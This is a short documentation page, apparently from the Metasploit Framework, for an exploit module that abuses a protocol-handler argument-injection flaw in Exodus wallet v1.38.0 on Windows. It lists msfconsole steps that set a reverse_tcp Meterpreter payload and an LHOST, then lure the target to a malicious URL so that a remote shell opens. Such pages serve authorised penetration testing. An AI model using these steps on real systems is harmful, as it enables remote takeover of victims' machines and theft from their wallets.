Path: blob/master/documentation/modules/exploit/windows/browser/exodus.md
27569 views
Description
This module exploits an Electron remote code execution vulnerability in Exodus wallet. Using the Electron remote code execution vulnerability in protocol handler is possible to inject command line arguments via URI handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application is available for download at Exodus v1.38.0.
Verification Steps
Install Exodus Wallet version
v1.38.0Start
msfconsoleDo
use exploit/windows/browser/exodusDo
set PAYLOAD windows/meterpreter/reverse_tcpDo
set LHOST ipDo
exploitOn the target machine, browse to the malicious URL and launch Exodus
Verify the Meterpreter session is opened